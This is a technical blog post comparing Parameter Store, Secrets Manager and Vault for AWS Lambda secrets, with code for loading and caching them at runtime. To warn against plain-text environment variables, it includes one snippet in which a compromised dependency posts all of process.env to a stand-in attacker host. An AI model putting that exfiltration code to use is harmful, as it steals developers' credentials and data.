AWS Lambda and Secret Management

Werner Vogels, the CTO of Amazon, describes AWS Lambda as the “connective tissue” for your cloud-native application. It’s an apt description, as AWS Lambda functions often connect to many services to transform and move data between them. Many of these services require you to authenticate your application with credentials or API keys. How to securely store and manage these application secrets is, therefore, a question frequently asked by serverless developers.

In terms of managing application secrets, there are many tools available to you, including:

  • AWS SSM Parameter Store.
  • AWS Secrets Manager.
  • HashiCorp Vault.

The question is: which should you use, and when?

There is also the question of how to deploy these secrets to your function. Some common approaches include:

  • Storing secrets in environment variables during deployment.
  • Storing secrets in the deployment artifact during deployment.
  • Loading secrets at runtime.

In this post, we will explore both of these questions, and give you some guidance on how to choose between the various options.

Parameter Store vs. Secrets Manager vs. Vault

As a serverless developer, these are the characteristics you should look for in a secrets management tool:

  • Encryption of secrets at rest and in-flight.
  • Role-based access control.
  • Cost-effectiveness.
  • Scalability.
  • A fully managed service, so developers don’t have to worry about provisioning and managing servers.

Parameter Store

Parameter Store ticks a lot of boxes:

  • Secrets are encrypted at rest and transmitted securely via HTTPS.
  • It has fine-grained access control via IAM. Lambda functions are given access only to the parameters they need.
  • It can be used through the AWS Console and the AWS CLI, and via its HTTPS API (see the sketch after this list).
  • It records a history of changes.
  • It’s free to use!
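As a rough illustration, here is how a Lambda function might read one of these parameters through the AWS SDK for JavaScript (v3). The parameter name /my-app/prod/db-password is hypothetical; for this call to succeed, the function’s IAM role would need ssm:GetParameter on that specific parameter (and kms:Decrypt on the key that encrypted it), which is exactly the kind of fine-grained scoping mentioned above.

```typescript
import { SSMClient, GetParameterCommand } from "@aws-sdk/client-ssm";

const ssm = new SSMClient({});

// Fetch a SecureString parameter and let Parameter Store decrypt it for us.
// The request goes over HTTPS and is authorised by the function's IAM role.
export const getDbPassword = async (): Promise<string> => {
  const result = await ssm.send(
    new GetParameterCommand({
      Name: "/my-app/prod/db-password", // hypothetical parameter name
      WithDecryption: true, // decrypt the SecureString value via KMS
    })
  );
  return result.Parameter!.Value!;
};
```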

The one downside of Parameter Store is its low throttling limit, around 100 requests per second. Unfortunately, this limit is not listed on the AWS Systems Manager Limits page, and you can’t raise it via a support ticket either. That said, as with a lot of the hard AWS limits, it’s possible to increase the throttling limit if you have a convincing use case. You would have to work with your AWS account manager and present your argument. Of course, this process takes time, so you cannot rely on it if you run into throttling problems in production.

If you only load parameters during the CI/CD pipeline, you should be safe from the low throttling limit. However, if you are loading parameters at runtime (more on this later), the low throttling limit presents a real issue.

Secrets Manager

Like Parameter Store, Secrets Manager uses AWS KMS to encrypt data at rest and controls access via fine-grained IAM permissions. It can also be managed through the AWS Console and the AWS CLI, and via its HTTPS API.

The notable differences between Parameter Store and Secrets Manager are:

  • Secrets Manager’s throttling limit is much higher, at 700 GetSecretValue requests per second.
  • Secrets Manager is not a free service. At $0.40 per secret per month and $0.05 per 10,000 API calls, it can be expensive when used at scale.
  • Secrets Manager does not store the history of changes.

Also, Secrets Manager supports secrets rotation out of the box, which is a compelling feature. For Amazon RDS databases, it can even rotate the credentials for you automatically, saving you from implementing the rotation logic yourself. For other types of secrets, you can implement custom rotation logic with a Lambda function.
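To give a sense of the shape of that custom rotation logic, here is a minimal, hypothetical skeleton of a rotation Lambda. Secrets Manager invokes the function once per rotation step (createSecret, setSecret, testSecret, finishSecret); what each step actually does depends on the type of secret being rotated, so the bodies are left as comments.

```typescript
// Hypothetical skeleton of a custom rotation Lambda for Secrets Manager.
// Secrets Manager calls the function with the secret's ARN, a token that
// identifies the new secret version, and the current rotation step.
interface RotationEvent {
  SecretId: string;
  ClientRequestToken: string;
  Step: "createSecret" | "setSecret" | "testSecret" | "finishSecret";
}

export const handler = async (event: RotationEvent): Promise<void> => {
  switch (event.Step) {
    case "createSecret":
      // Generate a new secret value and store it as the AWSPENDING version.
      break;
    case "setSecret":
      // Apply the pending value to the downstream service (e.g. update a DB user's password).
      break;
    case "testSecret":
      // Verify that the pending value actually works against the service.
      break;
    case "finishSecret":
      // Move the AWSCURRENT staging label to the new version to complete the rotation.
      break;
  }
};
```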

Vault

Vault encrypts the data and stores it in a number of supported storage backends, including Filesystem, Amazon S3, Google Cloud Storage, and MongoDB. Similar to Secrets Manager, Vault also supports key rotation out of the box.

Compared to Parameter Store and Secrets Manager, Vault is a more fully-fledged solution for the enterprise. It supports some use cases beyond general storage for application secrets. However, it also falls short on many fronts:

  • It’s not a managed service. You’d have to run and operate Vault as a service yourself.
  • Its rich feature set and extensibility also add to the learning curve. If you work mostly with AWS Lambda, you won’t need many of these features.
  • You have to run multiple EC2 instances to achieve high availability, which adds operational overhead.
  • From the client’s perspective, it’s designed to work with the Vault agent. This setup doesn’t work with AWS Lambda, as there’s nowhere for you to install the agent, which means you won’t be able to easily load secrets at runtime (more on this later).

Some might argue that running EC2 instances in multiple Availability Zones could be costly. But even a t3.micro instance ($0.0104/hour, or roughly $7.50 per month) can handle a fair amount of traffic, so an N+2 setup of three instances would only cost around $23 per month, and you probably won’t ever need more than that.

At a scale where thousands of secrets are accessed frequently, I believe Vault would work out a lot cheaper than Secrets Manager. However, this is assuming your team has the necessary skill set to set up and run Vault. If you need to bring in experts, the additional cost would likely far exceed what you would pay for Secrets Manager.

Which Option Should You Choose?

Based on the criteria we outlined earlier, all three solutions meet the basic feature requirements. They all support encryption at rest and in-flight, and all have a mechanism for granting role-based access to your secrets.

My recommendation depends on your needs:

  • If you need something simple and stay under 100 requests per second – go with Parameter Store.
  • If you need secret rotation (e.g., you are using Amazon RDS) or higher throughput than 100 requests per second – go with Secrets Manager.
  • If you have a large number of secrets and are concerned about runaway monthly cost – go with Vault, but only if you also have the necessary skill set to set up and run it yourself. Otherwise, stick with Secrets Manager and find ways to consolidate secrets to help reduce cost.

Deploying Secrets to Functions

Being able to store application secrets securely is a must, but it’s only part of the story. You also need a way to safely deploy the secrets to your Lambda functions and ensure they are secured at runtime.

Rule of Thumb

My rule of thumb is to never store secrets in plain text in environment variables or the deployment artifact. If a function is compromised, whether through a malicious dependency or a code injection attack, the attacker can easily steal data from the environment variables or the function folder. PureSec’s FunctionShield library can block attempts to transmit stolen data out of your function, but it’s not bulletproof either.
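To illustrate how little it takes: any code that runs inside your function, including a transitive dependency you never audited, can read the entire environment in a single call. The endpoint below is hypothetical; the point is simply that plain-text secrets in environment variables are one process.env away from an attacker.

```typescript
// A hypothetical sketch of what a compromised dependency could do: serialise
// every environment variable (including any plain-text secrets) and ship it
// to an attacker-controlled endpoint. fetch is built into Node.js 18+.
export const exfiltrate = async (): Promise<void> => {
  const stolen = JSON.stringify(process.env);
  await fetch("https://attacker.example.com/collect", {
    method: "POST",
    body: stolen,
  });
};
```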

Many developers would fetch the secrets from Parameter Store/Secrets Manager/Vault as part of their CI/CD pipeline, and bake them into environment variables in plain text. Unfortunately, this is also the behavior of the built-in Parameter Store support for the Serverless Framework and many of its community-driven plugins.

Other Approaches

A common variant of this approach is to put the decrypted secrets in a file and include it in the deployment artifact (ZIP file) that is uploaded to Amazon S3. During cold start, the Lambda function reads this file to fetch the secrets. Because the secrets are still stored in plain text, this approach is just as vulnerable: an attacker can compress the contents of the function’s execution folder and send the resulting ZIP file out for snooping.

Secrets should always be encrypted at rest, including in the deployment artifacts and function configurations. To ensure this, you need to store them in encrypted form and decrypt them at runtime. This is why my preferred approach is to load and decrypt the application secrets during a cold start. Parameter Store and Secrets Manager can perform both steps (fetch and decrypt) in a single API call. The decrypted secrets are then cached and optionally refreshed periodically. The middy middleware engine already supports this approach with both Parameter Store and Secrets Manager.
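If you’d rather not pull in middy, the pattern itself is straightforward. Below is a minimal sketch using Secrets Manager directly: the secret is fetched and decrypted on cold start, cached in module scope so warm invocations reuse it, and re-fetched once a TTL expires. The secret name and the one-hour TTL are assumptions for illustration.

```typescript
import {
  SecretsManagerClient,
  GetSecretValueCommand,
} from "@aws-sdk/client-secrets-manager";

const client = new SecretsManagerClient({});

// The cache lives in module scope, so it survives across warm invocations and
// is only repopulated on cold start or after the TTL expires.
let cachedSecret: string | undefined;
let fetchedAt = 0;
const TTL_MS = 60 * 60 * 1000; // hypothetical: refresh at most once an hour

const getSecret = async (): Promise<string> => {
  const stale = Date.now() - fetchedAt > TTL_MS;
  if (cachedSecret === undefined || stale) {
    const result = await client.send(
      new GetSecretValueCommand({ SecretId: "my-app/prod/api-key" }) // hypothetical name
    );
    cachedSecret = result.SecretString!;
    fetchedAt = Date.now();
  }
  return cachedSecret;
};

export const handler = async (): Promise<void> => {
  const apiKey = await getSecret();
  // ... use apiKey to call the downstream service
};
```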

This approach has the added benefit of being able to rotate secrets behind the scenes without having to redeploy your functions. But it’s not without shortcomings. For example, you incur additional cold start latency, as the function needs to fetch and decrypt secrets from either Parameter Store or Secrets Manager. From experience, this can add ~50ms to cold start time when the function has a single secret. It goes up to ~150ms by the time the function needs to fetch and decrypt ten secrets. Also, as discussed earlier, it’s difficult to implement this approach with Vault since there is no way to install the Vault agent.

Conclusions

In summary, you should start with Parameter Store if your use case is simple and you don’t need high throughput. As your use case becomes more sophisticated, you should consider Secrets Manager or Vault. Vault can cater for use cases beyond storing application secrets and is used in many enterprises already. However, when considering the cost of Secrets Manager vs. Vault, take into account the headcount cost if you need to bring in expertise to run it.

When it comes to deploying the secrets to the function, you should follow the same guideline: secrets should be encrypted at rest. Never store secrets in plain text in a function’s environment variables or its deployment artifacts. Instead, load, decrypt, and cache the secrets at runtime. But bear in mind that this approach introduces additional latency during cold start.